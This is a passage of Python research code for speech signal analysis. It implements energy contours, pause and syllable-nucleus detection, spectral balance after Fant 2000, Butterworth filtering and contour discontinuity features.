# scalar, string, list ...
# ['sts'] - stepsize of moving window
# ['win'] - window length
# OUT:
# y ndarray energy contour
def sig_energy(x,opt):
dflt={'wintyp':'hamming','winparam':'','sts':0.01,'win':0.05}
opt = myl.opt_default(opt,dflt)
# stepsize and winlength in samples
sts = round(opt['sts']*opt['fs'])
win = min([math.floor(len(x)/2),round(opt['win']*opt['fs'])])
# weighting window
w = sig_window(opt['wintyp'],win,opt['winparam'])
# energy values
y = np.asarray([])
for j in myl.idx_a(len(x)-win,sts):
s = x[j:j+len(w)]*w
y = myl.push(y,myl.rmsd(s))
return y
# wrapper around windows
# IN:
# typ: any type supported by scipy.signal.get_window()
# lng: <1> length
# par: <''> additional parameters as string, scalar, list etc
# OUT:
# window array
def sig_window(typ,l=1,par=''):
if typ=='none' or typ=='const':
return np.ones(l)
if ((type(par) is str) and (len(par) == 0)):
return sis.get_window(typ,l)
return sis.get_window((typ,par),l)
# pause detection
# IN:
# s - mono signal
# opt['fs'] - sample frequency
# ['ons'] - idx onset <0> (to be added to time output)
# ['flt']['f'] - filter options, boundary frequencies in Hz
# (2 values for btype 'band', else 1): <8000> (evtl. lowered by fu_filt())
# ['btype'] - <'band'>|'high'|<'low'>
# ['ord'] - butterworth order <5>
# ['fs'] - (internally copied)
# ['l'] - analysis window length (in sec)
# ['l_ref'] - reference window length (in sec)
# ['e_rel'] - min energy quotient analysisWindow/referenceWindow
# ['fbnd'] - True|<False> assume pause at beginning and end of file
# ['n'] - <-1> extract exactly n pauses (if > -1)
# ['min_pau_l'] - min pause length <0.5> sec
# ['min_chunk_l'] - min inter-pausal chunk length <0.2> sec
# ['force_chunk'] - <False>, if True, pause-only is replaced by chunk-only
# ['margin'] - <0> time to reduce pause on both sides (sec; if chunks need init and final silence)
# OUT:
# pau['tp'] 2-dim array of pause [on off] (in sec)
# ['tpi'] 2-dim array of pause [on off] (indices in s = sampleIdx-1 !!)
# ['tc'] 2-dim array of speech chunks [on off] (i.e. non-pause, in sec)
# ['tci'] 2-dim array of speech chunks [on off] (indices)
# ['e_ratio'] - energy ratios corresponding to pauses in ['tp'] (analysisWindow/referenceWindow)
def pau_detector(s,opt={}):
if 'fs' not in opt:
sys.exit('pau_detector: opt does not contain key fs.')
dflt = {'e_rel':0.0767,'l':0.1524,'l_ref':5,'n':-1,'fbnd':False,'ons':0,'force_chunk':False,
'min_pau_l':0.4,'min_chunk_l':0.2,'margin':0,
'flt':{'btype':'low','f':np.asarray([8000]),'ord':5}}
opt = myl.opt_default(opt,dflt)
opt['flt']['fs'] = opt['fs']
## removing DC, low-pass filtering
flt = fu_filt(s,opt['flt'])
y = flt['y']
## pause detection for >=n pauses
t, e_ratio = pau_detector_sub(y,opt)
if len(t)>0:
## extending 1st and last pause to file boundaries
if opt['fbnd']==True:
t[0,0]=0
t[-1,-1]=len(y)-1
## merging pauses across too short chunks
## merging chunks across too small pauses
if (opt['min_pau_l']>0 or opt['min_chunk_l']>0):
t, e_ratio = pau_detector_merge(t,e_ratio,opt)
## too many pauses?
# -> subsequently remove the ones with highest e-ratio
if (opt['n']>0 and len(t)>opt['n']):
t, e_ratio = pau_detector_red(t,e_ratio,opt)
## speech chunks
tc = pau2chunk(t,len(y))
## pause-only -> chunk-only
if (opt['force_chunk']==True and len(tc)==0):
tc = cp.deepcopy(t)
t = np.asarray([])
e_ratio = np.asarray([])
## add onset
t = t+opt['ons']
tc = tc+opt['ons']
## return dict
## incl fields with indices to seconds (index+1=sampleIndex)
pau={'tpi':t, 'tci':tc, 'e_ratio': e_ratio}
pau['tp'] = myl.idx2sec(t,opt['fs'])
pau['tc'] = myl.idx2sec(tc,opt['fs'])
#print(pau)
return pau
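# Usage sketch for pau_detector() (values are illustrative): detect pauses of
# at least 0.5 s in a mono signal s sampled at 16 kHz:
#   pau = pau_detector(s, {'fs': 16000, 'min_pau_l': 0.5})
#   pau['tp']   # [[on, off], ...] pause intervals in seconds
#   pau['tc']   # [[on, off], ...] speech chunks between the pauses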
# merging pauses across too short chunks
# merging chunks across too small pauses
# IN:
# t [[on off]...] of pauses
# e [e_rat ...]
# OUT:
# t [[on off]...] merged
# e [e_rat ...] merged (simply mean of merged segments taken)
def pau_detector_merge(t,e,opt):
## min pause and chunk length in samples
mpl = myl.sec2smp(opt['min_pau_l'],opt['fs'])
mcl = myl.sec2smp(opt['min_chunk_l'],opt['fs'])
## merging chunks across short pauses
tm = np.asarray([])
em = np.asarray([])
for i in myl.idx_a(len(t)):
if ((t[i,1]-t[i,0] >= mpl) or
(opt['fbnd']==True and (i==0 or i==len(t)-1))):
tm = myl.push(tm,t[i,:])
em = myl.push(em,e[i])
# nothing done in previous step?
if len(tm)==0:
tm = cp.deepcopy(t)
em = cp.deepcopy(e)
if len(tm)==0:
return t, e
## merging pauses across short chunks
tn = np.asarray([tm[0,:]])
en = np.asarray([em[0]])
if (tn[0,0]<mcl): tn[0,0]=0
for i in np.arange(1,len(tm),1):
if (tm[i,0] - tn[-1,1] < mcl):
tn[-1,1] = tm[i,1]
en[-1] = np.mean([en[-1],em[i]])
else:
tn = myl.push(tn,tm[i,:])
en = myl.push(en,em[i])
#print("t:\n", t, "\ntm:\n", tm, "\ntn:\n", tn) #!v
return tn, en
# pause to chunk intervals
# IN:
# t [[on off]] of pause segments (indices in signal)
# l length of signal vector
# OUT:
# tc [[on off]] of speech chunks
def pau2chunk(t,l):
if len(t)==0:
return np.asarray([[0,l-1]])
if t[0,0]>0:
tc = np.asarray([[0,t[0,0]-1]])
else:
tc = np.asarray([])
for i in np.arange(0,len(t)-1,1):
if t[i,1] < t[i+1,0]-1:
tc = myl.push(tc,[t[i,1]+1,t[i+1,0]-1])
if t[-1,1]<l-1:
tc = myl.push(tc,[t[-1,1]+1,l-1])
return tc
# called by pau_detector
# IN:
# as for pau_detector
# OUT:
# t [on off]
# e_ratio
def pau_detector_sub(y,opt):
## settings
# reference window span
rl = math.floor(opt['l_ref']*opt['fs'])
# signal length
ls = len(y)
# min pause length
ml = opt['l']*opt['fs']
# global rmse and pause threshold
e_rel = cp.deepcopy(opt['e_rel'])
# global rmse
# as fallback in case reference window is likely to be pause
# almost-zeros excluded (cf percentile) since otherwise pauses
# show a too high influence, i.e. lower the reference too much
# so that too few pauses detected
#e_glob = myl.rmsd(y)
ya = abs(y)
qq = np.percentile(ya,[50])
e_glob = myl.rmsd(ya[ya>qq[0]])
t_glob = opt['e_rel']*e_glob
# stepsize
sts=max([1,math.floor(0.05*opt['fs'])])
# energy calculation in analysis and reference windows
wopt_en = {'win':ml,'rng':[0,ls]}
wopt_ref = {'win':rl,'rng':[0,ls]}
# loop until opt.n criterion is fulfilled
# increasing energy threshold up to 1
while e_rel < 1:
# pause [on off], pause index
t=np.asarray([])
j=0
# [e_y/e_rw] indices as in t
e_ratio=np.asarray([])
i_steps = np.arange(1,ls,sts)
for i in i_steps:
# window
yi = myl.windowing_idx(i,wopt_en)
e_y = myl.rmsd(y[yi])
# energy in reference window
e_r = myl.rmsd(y[myl.windowing_idx(i,wopt_ref)])
# take overall energy as reference if reference window is pause
if (e_r <= t_glob):
e_r = e_glob
# if rmse in window below threshold
if e_y <= e_r*e_rel:
yis = yi[0]
yie = yi[-1]
if len(t)-1==j:
# values belong to already detected pause
if len(t)>0 and yis<t[j,1]:
t[j,1]=yie
# evtl. needed to throw away superfluous
# pauses with high e_ratio
e_ratio[j]=np.mean([e_ratio[j],e_y/e_r])
else:
t = myl.push(t,[yis, yie])
e_ratio = myl.push(e_ratio,e_y/e_r)
j=j+1
else:
t=myl.push(t,[yis, yie])
e_ratio = myl.push(e_ratio,e_y/e_r)
# (more than) enough pauses detected?
if len(t) >= opt['n']: break
e_rel = e_rel+0.1
if opt['margin']==0 or len(t)==0:
return t, e_ratio
# shorten pauses by margins
mar=int(opt['margin']*opt['fs'])
tm, erm = myl.ea(), myl.ea()
for i in myl.idx_a(len(t)):
# only slim non-init and -fin pauses
if i>0:
ts = t[i,0]+mar
else:
ts = t[i,0]
if i < len(t)-1:
te = t[i,1]-mar
else:
te = t[i,1]
# pause disappeared
if te <= ts:
# ... but needs to be kept
if opt['n']>0:
tm = myl.push(tm,[t[i,0],t[i,1]])
erm = myl.push(erm,e_ratio[i])
continue
# pause still there
tm = myl.push(tm,[ts,te])
erm = myl.push(erm,e_ratio[i])
return tm, erm
def pau_detector_red(t,e_ratio,opt):
# keep boundary pauses
if opt['fbnd']==True:
n=opt['n']-2
#bp = [t[0,],t[-1,]]
bp = np.concatenate((np.array([t[0,]]),np.array([t[-1,]])),axis=0)
ii = np.arange(1,len(t)-1,1)
t = t[ii,]
e_ratio=e_ratio[ii]
else:
n=opt['n']
bp=np.asarray([])
if n==0:
t=[]
# remove pause with highest e_ratio
while len(t)>n:
i = myl.find(e_ratio,'is','max')
j = myl.find(np.arange(1,len(e_ratio),1),'!=',i[0])
t = t[j,]
e_ratio = e_ratio[j]
# re-add boundary pauses if removed
if opt['fbnd']==True:
if len(t)==0:
t=np.concatenate((np.array([bp[0,]]),np.array([bp[1,]])),axis=0)
else:
t=np.concatenate((np.array([bp[0,]]),np.array([t]),np.array([bp[1,]])),axis=0)
return t, e_ratio
# spectral balance calculation according to Fant 2000
# IN:
# sig: signal (vowel segment)
#   fs: sample rate
# opt:
# 'win': length of central window in ms <len(sig)>; -1 is same as len(sig)
# 'ub': upper freq boundary in Hz <-1> default: no low-pass filtering
# 'domain': <'freq'>|'time'; pre-emp in frequency (Fant) or time domain
# 'alpha': <0.95> for time domain only y[n] = x[n]-alpha*x[n-1]
# if alpha>0 it is interpreted as lower freq threshold for pre-emp
# OUT:
# sb: spectral tilt
def splh_spl(sig,fs,opt_in={}):
opt = cp.deepcopy(opt_in)
opt = myl.opt_default(opt,{'win':len(sig),'f':-1,'btype':'none',
'domain':'freq','alpha':0.95})
#print(opt)
#myl.stopgo()
## cut out center window ##################################
ls = len(sig)
if opt['win'] <= 0:
opt['win'] = ls
if opt['win'] < ls:
wi = myl.windowing_idx(int(ls/2),
{'rng':[0, ls],
'win':int(opt['win']*fs)})
y = sig[wi]
else:
y = cp.deepcopy(sig)
if len(y)==0:
return np.nan
# reference sound pressure level
p_ref = pRef('spl')
## pre-emp in time domain ####################################
if opt['domain']=='time':
# low pass filtering
if opt['btype'] != 'none':
flt = fu_filt(y,{'fs':fs,'f':opt['f'],'ord':6,
'btype':opt['btype']})
y = flt['y']
yp = pre_emphasis(y,opt['alpha'],fs,False)
y_db = 20*np.log10(myl.rmsd(y)/p_ref)
yp_db = 20*np.log10(myl.rmsd(yp)/p_ref)
#print(yp_db - y_db)
return yp_db - y_db
## pre-emp in frequency domain ##############################
# according to Fant
# actual length of cut signal
n = len(y)
## hamming windowing
y *= np.hamming(n)
## spectrum
Y = np.fft.fft(y,n)
N = int(len(Y)/2)
## frequency components
XN = np.fft.fftfreq(n,d=1/fs)
X = XN[0:N]
# same as X = np.linspace(0, fs/2, N, endpoint=True)
## amplitudes
# sqrt(Y.real**2 + Y.imag**2)
# to be normalized:
# *2 since only half of transform is used
# /N since output needs to be normalized by number of samples
# (tested on sinus, cf
# http://www.cbcity.de/die-fft-mit-python-einfach-erklaert)
a = 2*np.abs(Y[:N])/N
## vowel-relevant upper frequency boundary
if opt['btype'] != 'none':
vi = fu_filt_freq(X,opt)
if len(vi)>0:
X = X[vi]
a = a[vi]
## Fant preemphasis filter (Fant et al 2000, p10f eq 20)
preemp = 10*np.log10((1+X**2/200**2)/(1+X**2/5000**2))
ap = 10*np.log10(a)+preemp
# retransform to absolute scale
ap = 10**(ap/10)
# corresponds to gain values in Fant 2000, p11
#for i in myl.idx(a):
# print(X[i],preemp[i])
#myl.stopgo()
## get sound pressure level of both spectra
# as 20*log10(P_eff/P_ref)
spl = 20*np.log10(myl.rmsd(a)/p_ref)
splh = 20*np.log10(myl.rmsd(ap)/p_ref)
## get energy level of both spectra
#spl = 20*np.log10(myl.mse(a)/p_ref)
#splh = 20*np.log10(myl.mse(ap)/p_ref)
## spectral balance
sb = splh-spl
#print(spl,splh,sb)
#myl.stopgo()
#fig = plt.figure()
#plt.plot(X,20*np.log10(a),'b')
#plt.plot(X,20*np.log10(preemp),'g')
#plt.plot(X,20*np.log10(ap),'r')
#plt.show()
return sb
# returns indices of freq in X fulfilling conditions in opt
# IN:
# X: freq array
# opt: 'btype' - 'none'|'low'|'high'|'band'|'stop'
# 'f': 1 freq for low|high, 2 freq for band|stop
# OUT:
# i: indices in X fulfilling condition
def fu_filt_freq(X,opt):
typ = opt['btype']
f = opt['f']
# all indices
if typ=='none':
return myl.idx_a(len(X))
# error handling
if re.search('(band|stop)',typ) and (not myl.listType(f)):
print('filter type requires frequency list. Done nothing.')
return myl.idx_a(len(X))
if re.search('(low|high)',typ) and myl.listType(f):
print('filter type requires only 1 frequency value. Done nothing.')
return myl.idx_a(len(X))
if typ=='low':
return np.nonzero(X<=f)
elif typ=='high':
return np.nonzero(X>=f)
    elif typ == 'band':
        # indices between the two cutoff frequencies (intersection of both conditions)
        return np.intersect1d(np.nonzero(X >= f[0])[0], np.nonzero(X <= f[1])[0])
    elif typ == 'stop':
        # indices outside the two cutoff frequencies (union of both conditions)
        return np.union1d(np.nonzero(X <= f[0])[0], np.nonzero(X >= f[1])[0])
return myl.idx_a(len(X))
# returns reference levels for typ
# IN:
# typ
# 'spl': sound pressure level
# 'i': intensity level
# OUT:
# corresponding reference level
def pRef(typ):
if typ=='spl':
return 2*10**(-5)
return 10**(-12)
# syllable nucleus detection
# IN:
# s - mono signal
# opt['fs'] - sample frequency
# ['ons'] - onset in sec <0> (to be added to time output)
# ['flt']['f'] - filter options, boundary frequencies in Hz
# (2 values for btype 'band', else 1): <np.asarray([200,4000])>
# ['btype'] - <'band'>|'high'|'low'
# ['ord'] - butterworth order <5>
# ['fs'] - (internally copied)
# ['l'] - analysis window length
# ['l_ref'] - reference window length
# ['d_min'] - min distance between subsequent nuclei (in sec)
# ['e_min'] - min energy required for nucleus as a proportion to max energy <0.16>
# ['e_rel'] - min energy quotient analysisWindow/referenceWindow
#   ['e_val'] - quotient specifying how deep the energy valley between two nucleus
#               candidates must be. Measured relative to the lower energy
# candidate. The lower, the deeper the required valley between
# two peaks. Meaningful range ]0, 1]. Recommended range:
# [0.9 1[
# ['center'] - boolean; subtract mean energy
# OUT:
# ncl['t'] - vector of syl ncl time stamps (in sec)
# ['ti'] - corresponding vector idx in s
# ['e_ratio'] - corresponding energy ratios (analysisWindow/referenceWindow)
# bnd['t'] - vector of syl boundary time stamps (in sec)
# ['ti'] - corresponding vector idx in s
# ['e_ratio'] - corresponding energy ratios (analysisWindow/referenceWindow)
def syl_ncl(s,opt={}):
## settings
if 'fs' not in opt:
sys.exit('syl_ncl: opt does not contain key fs.')
dflt = {'flt':{'f':np.asarray([200,4000]),'btype':'band','ord':5},
'e_rel':1.05,'l':0.08,'l_ref':0.15, 'd_min':0.12, 'e_min':0.1,
'ons':0, 'e_val': 1, 'center': False}
opt = myl.opt_default(opt,dflt)
opt['flt']['fs'] = opt['fs']
if syl_ncl_trouble(s,opt):
t = np.asarray([round(len(s)/2+opt['ons'])])
ncl = {'ti':t, 't':myl.idx2sec(t,opt['fs']), 'e_ratio':[0]}
bnd = cp.deepcopy(ncl)
return ncl, bnd
# reference window length
rws = math.floor(opt['l_ref']*opt['fs'])
# energy win length
ml = math.floor(opt['l']*opt['fs'])
# stepsize
sts = max([1,math.floor(0.03*opt['fs'])])
# minimum distance between subsequent nuclei
# (in indices)
#md = math.floor(opt['d_min']*opt['fs']/sts)
md = math.floor(opt['d_min']*opt['fs'])
# bandpass filtering
flt = fu_filt(s,opt['flt'])
y = flt['y']
# signal length
ls = len(y)
# minimum energy as proportion of maximum energy found
e_y = np.asarray([])
i_steps = np.arange(1,ls,sts)
for i in i_steps:
yi = np.arange(i,min([ls,i+ml-1]),1)
e_y = np.append(e_y,myl.rmsd(y[yi]))
if bool(opt['center']):
e_y -= np.mean(e_y)
e_min = opt['e_min']*max(e_y)
# output vector collecting nucleus sample indices
t = np.asarray([])
all_i = np.asarray([])
all_e = np.asarray([])
all_r = np.asarray([])
# energy calculation in analysis and reference windows
wopt_en = {'win':ml,'rng':[0,ls]}
wopt_ref = {'win':rws,'rng':[0,ls]}
for i in i_steps:
yi = myl.windowing_idx(i,wopt_en)
#yi = np.arange(yw[0],yw[1],1)
ys = y[yi]
e_y = myl.rmsd(ys)
#print(ys,'->',e_y)
ri = myl.windowing_idx(i,wopt_ref)
#ri = np.arange(rw[0],rw[1],1)
rs = y[ri]
e_rw = myl.rmsd(rs)
all_i = np.append(all_i,i)
all_e = np.append(all_e,e_y)
all_r = np.append(all_r,e_rw)
# local energy maxima
# (do not use min duration md for order option, since local
# maximum might be obscured already by energy increase
# towards neighboring peak further away than md, and not only by
# closer than md peaks)
idx = sis.argrelmax(all_e,order=1)
#plot_sylncl(all_e,idx) #!v
#print(opt["ons"]/opt["fs"] + np.array(idx)*sts/opt["fs"]) #!v
#myl.stopgo() #!v
### maxima related to syl ncl
## a) energy constraints
# timestamps (idx)
tx = np.asarray([])
# energy ratios
e_ratiox = np.asarray([])
# idx in all_i
tix = np.asarray([]).astype(int)
for i in idx[0]:
# valley between this and previous nucleus deep enough?
if len(tix)>0:
ie = all_e[tix[-1]:i]
if len(ie)<3:
continue
valley = np.min(ie)
nclmin = np.min([ie[0],all_e[i]])
if valley >= opt['e_val'] * nclmin:
# replace previous nucleus by current one
if all_e[i] > ie[0]: #!n
all_e[tix[-1]] = all_e[i] #!n
tx[-1] = all_i[i] #!n
tix[-1] = i #!n
e_ratiox[-1] = all_e[i]/all_r[i] #!n
#print("valley constraint -- tx:", all_i[i]/opt["fs"], "nclmin:", nclmin, "valley:", valley, "ie0:", ie[0], "all_e:", all_e[i], "--> skip!") #!v
continue
if ((all_e[i] >= all_r[i]*opt['e_rel']) and (all_e[i] > e_min)):
tx = np.append(tx,all_i[i])
tix = np.append(tix,i)
e_ratiox = np.append(e_ratiox, all_e[i]/all_r[i])
#else: #!v
# print("min_en constraint -- tx:", all_i[i]/opt["fs"], "all_e:", all_e[i], "all_r:", all_r[i], "e_min:", e_min, "--> skip!") #!v
#print(len(tx)) #!v
if len(tx)==0:
dflt = {'ti':myl.ea(),
't':myl.ea(),
'e_ratio':myl.ea()}
return dflt, dflt
#plot_sylncl(all_e,tix) #!v
## b) min duration constraints
# init by first found ncl
t = np.array([tx[0]])
e_ratio = np.array([e_ratiox[0]])
# idx in all_i
ti = np.array([tix[0]]).astype(int)
for i in range(1,len(tx)):
# ncl too close
if np.abs(tx[i]-t[-1]) < md:
# current ncl with higher energy: replace last stored one
if e_ratiox[i] > e_ratio[-1]:
t[-1] = tx[i]
ti[-1] = tix[i]
e_ratio[-1] = e_ratiox[i]
else:
t = np.append(t,tx[i])
ti = np.append(ti,tix[i])
e_ratio = np.append(e_ratio,e_ratiox[i])
#plot_sylncl(all_e,ti) #!v
### minima related to syl bnd
tb = np.asarray([])
e_ratio_b = np.asarray([])
if len(t)>1:
for i in range(len(ti)-1):
j = myl.idx_seg(ti[i],ti[i+1])
j_min = myl.find(all_e[j],'is','min')
if len(j_min)==0: j_min=[0]
# bnd idx
bj = j[0]+j_min[0]
tb = np.append(tb,all_i[bj])
e_ratio_b = np.append(e_ratio_b, all_e[bj]/all_r[bj])
# add onset
t = t+opt['ons']
tb = tb+opt['ons']
# output dict,
# incl idx to seconds
ncl = {'ti':t, 't':myl.idx2sec(t,opt['fs']), 'e_ratio':e_ratio}
bnd = {'ti':tb, 't':myl.idx2sec(tb,opt['fs']), 'e_ratio':e_ratio_b}
#print(ncl['t'], e_ratio)
return ncl, bnd
def syl_ncl_trouble(s,opt):
if len(s)/opt['fs'] < 0.1:
return True
return False
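# Illustrative usage sketch, not part of the original module: running syl_ncl()
# on one second of amplitude-modulated noise whose energy bumps mimic syllable
# nuclei. The signal is synthetic, and the sketch relies on the same myl helper
# module and numpy import used throughout this file.
def _demo_syl_ncl(fs=16000):
    t = np.arange(0, 1, 1/fs)
    env = 0.1 + np.abs(np.sin(2*np.pi*1.5*t))   # three energy bumps in 1 s
    s = env * np.random.randn(len(t))
    ncl, bnd = syl_ncl(s, {'fs': fs})
    return ncl['t'], bnd['t']                   # nucleus and boundary times (sec)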
# wrapper around Butter filter
# IN:
# 1-dim vector
# opt['fs'] - sample rate
# ['f'] - scalar (high/low) or 2-element vector (band) of boundary freqs
#        ['ord'] - filter order
# ['btype'] - band|low|high; all other values: signal returned as is
# OUT:
# flt['y'] - filtered signal
# ['b'] - coefs
# ['a']
def fu_filt(y,opt):
# do nothing
if not re.search('^(high|low|band)$',opt['btype']):
return {'y': y, 'b': myl.ea(), 'a': myl.ea()}
# check f<fs/2
if (opt['btype'] == 'low' and opt['f']>=opt['fs']/2):
opt['f']=opt['fs']/2-100
elif (opt['btype'] == 'band' and opt['f'][1]>=opt['fs']/2):
opt['f'][1]=opt['fs']/2-100
fn = opt['f']/(opt['fs']/2)
b, a = sis.butter(opt['ord'], fn, btype=opt['btype'])
yf = sis.filtfilt(b,a,y)
return {'y':yf,'b':b,'a':a}
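# Illustrative usage sketch, not part of the original module: band-pass
# filtering a noisy 440 Hz tone with fu_filt(). The signal and option values
# are made up; note that the option key for the filter order is 'ord'.
def _demo_fu_filt(fs=16000):
    t = np.arange(0, 1, 1/fs)
    s = np.sin(2*np.pi*440*t) + 0.3*np.random.randn(len(t))
    flt = fu_filt(s, {'fs': fs, 'f': np.asarray([200, 4000]),
                      'btype': 'band', 'ord': 5})
    return flt['y']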
##### discontinuity measurement #######################################
# measures delta and linear fit discontinuities between
# adjacent array elements in terms of:
# - delta
# - reset of regression lines
# - root mean squared deviation between overall regression line and
# -- preceding segment's regression line
# -- following segment's regression line
# -- both, preceding and following, regression lines
# - extrapolation rmsd between following regression line
# and following regression line, extrapolated by regression
# on preceding segment
# IN:
# x: nx2 array [[time val] ...]
# OR
# nx1 array [val ...]
# for the latter indices are taken as time stamps
# ts: nx1 array [time ...] of time stamps (or indices for size(x)=nx1)
# at which to calculate discontinuity; if empty, discontinuity is
# calculated at each point in time. If size(x)=nx1 ts MUST contain
# indices
# nx2 array [[t_off t_on] ...] to additionally account for pauses
# opt: dict
# .win: <'glob'>|'loc' calculate discontinuity over entire sequence
# or within window
# .l: <3> if win==loc, length of window in sec or idx
# (splitpoint - .l : splitpoint + .l)
# .do_plot: <0> plots orig contour and linear stylization
# .plot: <{}> dict with plotting options; cf. discont_seg()
# OUT:
# d dict
# (s1: pre-bnd segment [i-l,i[,
# s2: post-bnd segment [i,i+l]
# sc: joint segment [i-l,i+l])
# dlt: delta
# res: reset
# ry1: s1, rmsd between joint vs pre-bnd fit
# ry2: s2, rmsd between joint vs post-bnd fit
# ryc: sc, rmsd between joint vs pre+post-bnd fit
# ry2e: s2: rmsd between pre-bnd fit extrapolated to s2 and post-bnd fit
# rx1: s1, rmsd between joint fit and pre-boundary x-values
# rx2: s2, rmsd between joint fit and post-boundary x-values
# rxc: sc, rmsd between joint fit and pre+post-boundary x-values
# rr1: s1, ratio rmse(joint_fit)/rmse(pre-bnd_fit)
# rr2: s2, ratio rmse(joint_fit)/rmse(post-bnd_fit)
# rrc: sc, ratio rmse(joint_fit)/rmse(pre+post-bnd_fit)
# ra1: c1-rate s1
# ra2: c1-rate s2
# dlt_ra: ra2-ra1
# s1_c3: cubic fitting coefs of s1
# s1_c2
# s1_c1
# s1_c0
# s2_c3: cubic fitting coefs of s2
# s2_c2
# s2_c1
# s2_c0
# dlt_c3: s2_c3-s1_c3
# dlt_c2: s2_c2-s1_c2
# dlt_c1: s2_c1-s1_c1
# dlt_c0: s2_c0-s1_c0
# eucl_c: euclDist(s1_c*,s2_c*)
# corr_c: corr(s1_c*,s2_c*)
# v1: variance in s1
# v2: variance in s2
# vc: variance in sc
# vr: variance ratio (mean(v1,v2))/vc
# dlt_v: v2-v1
# m1: mean in s1
# m2: mean in s2
# dlt_m: m2-m1
# p: pause length (in sec or idx depending on numcol(x);
#        always 0, if ts is empty or 1-dim)
# i in each list refers to discontinuity between x[i-1] and x[i]
# dimension of each list: if len(ts)==0: n-1 array (first x-element skipped)
# else: mx6; m is number of ts-elements in range of x[:,0],
# resp. in index range of x[1:-1]
## REMARKS:
# for all variables but corr_c and vr higher values indicate higher discontinuity
## variables:
# x1: original f0 contour for s1
# x2: original f0 contour for s2
# xc: original f0 contour for sc
# y1: line fitted on segment a
# y2: line fitted on segment b
# yc: line fitted on segments a+b
# yc1: yc part for x1
# yc2: yc part for x2
# ye: x1/y1-fitted line for x2
# cu1: cubic fit coefs of time-nrmd s1
# cu2: cubic fit coefs of time-nrmd s2
# yu1: polyval(cu1)
# yu2: polyval(cu2); yu1 and yu2 are cut to same length
def discont(x,ts=[],opt={}):
# time: first column or indices
if np.ndim(x)==1:
t = np.arange(0,len(x))
x = np.asarray(x)
else:
t = x[:,0]
x = x[:,1]
# tsi: index pairs in x for which to derive discont values
    # [[infimum supremum]...] s1 right-aligned to infimum, s2 left-aligned to supremum
# for 1-dim ts both values are adjacent [[i-1, i]...]
# zp: zero pause True for 1-dim ts input, False for 2-dim
tsi, zp = discont_tsi(t,ts)
# opt init
opt = myl.opt_default(opt,{'win':'glob','l':3,'do_plot':False,
'plot': {}})
# output
d = discont_init()
# linear fits
# over time stamp pairs
for ii in tsi:
## delta
d['dlt'].append(x[ii[1]]-x[ii[0]])
## segments (x, y values of pre-, post, joint segments)
t1,t2,tc,x1,x2,xc,y1,y2,yc,yc1,yc2,ye,cu1,cu2,yu1,yu2 = discont_seg(t,x,ii,opt)
d = discont_feat(d,t1,t2,tc,x1,x2,xc,y1,y2,yc,yc1,yc2,ye,cu1,cu2,yu1,yu2,zp)
    # convert feature lists to np.array
    for key in d:
        d[key] = np.asarray(d[key])
return d
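# Illustrative usage sketch, not part of the original module: discontinuity
# features for a 1-dim contour with an artificial jump at index 20. Since the
# input is 1-dim, ts must contain indices; the contour values are made up and
# the sketch relies on the myl helper module used throughout this file.
def _demo_discont():
    x = np.concatenate((np.linspace(100, 120, 20),
                        np.linspace(160, 150, 20)))
    d = discont(x, ts=[20])
    return d['dlt'], d['res']   # delta and reset at the requested boundary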
# init discont dict
def discont_init():
return {"dlt": [],
"res": [],
"ry1": [],
"ry2": [],
"ryc": [],
"ry2e": [],
"rx1": [],
"rx2": [],
"rxc": [],
"rr1": [],
"rr2": [],
"rrc": [],
"ra1": [],
"ra2": [],
"dlt_ra": [],
"s1_c3": [],
"s1_c2": [],
"s1_c1": [],
"s1_c0": [],
"s2_c3": [],
"s2_c2": [],
"s2_c1": [],
"s2_c0": [],
"dlt_c3": [],
"dlt_c2": [],
"dlt_c1": [],
"dlt_c0": [],
"eucl_c": [],
"corr_c": [],
"eucl_y": [],
"corr_y": [],
"v1": [],
"v2": [],
"vc": [],
"vr": [],
"dlt_v": [],
"m1": [],
"m2": [],
"dlt_m": [],
"p": []}
# pre/post-boundary and joint segments
def discont_seg(t,x,ii,opt):
# preceding, following segment indices
i1, i2 = discont_idx(t,ii,opt)
#print(ii,"\n-> ", i1,"\n-> ", i2) #!v
#myl.stopgo() #!v
t1, t2, x1, x2 = t[i1], t[i2], x[i1], x[i2]
tc = np.concatenate((t1,t2))
xc = np.concatenate((x1,x2))
    # normalized time (only needed for reported polycoefs, not
    # for the output lines)
tn1 = myl.nrm_vec(t1,{'mtd': 'minmax',
'rng': [-1, 1]})
tn2 = myl.nrm_vec(t2,{'mtd': 'minmax',
'rng': [-1, 1]})
# linear fit coefs
c1 = myPolyfit(t1,x1,1)
c2 = myPolyfit(t2,x2,1)
cc = myPolyfit(tc,xc,1)
# cubic fit coefs (for later shape comparison)
cu1 = myPolyfit(tn1,x1,3)
cu2 = myPolyfit(tn2,x2,3)
yu1 = np.polyval(cu1,tn1)
yu2 = np.polyval(cu2,tn2)
# cut to same length (from boundary)
ld = len(yu1)-len(yu2)
if ld>0:
yu1=yu1[ld:len(yu1)]
elif ld<0:
yu2=yu2[0:ld]
# robust treatment
while len(yu2)<len(yu1):
yu2 = np.append(yu2,yu2[-1])
while len(yu1)<len(yu2):
yu1 = np.append(yu1,yu1[-1])
# fit values
y1 = np.polyval(c1,t1)
y2 = np.polyval(c2,t2)
yc = np.polyval(cc,tc)
# distrib yc over t1 and t2
yc1, yc2 = yc[0:len(y1)], yc[len(y1):len(yc)]
# linear extrapolation
ye = np.polyval(c1,t2)
# legend_loc: 'upper left'
## plotting linear fits
# segment boundary
xb = []
xb.extend(yu1)
xb.extend(yu2)
xb.extend(ye)
xb.extend(x1)
xb.extend(x2)
xb = np.asarray(xb)
if opt['do_plot'] and len(xb)>0:
lw1, lw2 = 5,3
yb = [np.min(xb), np.max(xb)]
tb = [t1[-1], t1[-1]]
po = opt["plot"]
po = myl.opt_default(po,{"legend_loc": "best",
"fs_legend": 35,
"fs": (20,12),
"fs_title": 40,
"fs_ylab": 30,
"fs_xlab": 30,
"title": "",
"xlab": "time",
"ylab": ""})
po["ls"] = {"o": "--k", "b": "-k", "s1": "-g", "s2": "-g",
"sc": "-r", "se": "-c"}
po["lw"] = {"o": lw2, "b": lw2, "s1": lw1, "s2": lw1, "sc": lw1, "se": lw2}
po["legend_order"] = ["o", "b", "s1", "s2", "sc", "se"]
po["legend_lab"] = {"o": "orig", "b": "bnd", "s1": "fit s1", "s2": "fit s2",
"sc": "fit joint", "se": "pred s2"}
myl.myPlot({"o": tc, "b": tb, "s1": t1, "s2": t2, "sc": tc, "se": t2},
{"o": xc, "b": yb, "s1": y1, "s2": y2, "sc": yc, "se": ye},
po)
return t1,t2,tc,x1,x2,xc,y1,y2,yc,yc1,yc2,ye,cu1,cu2,yu1,yu2
## features
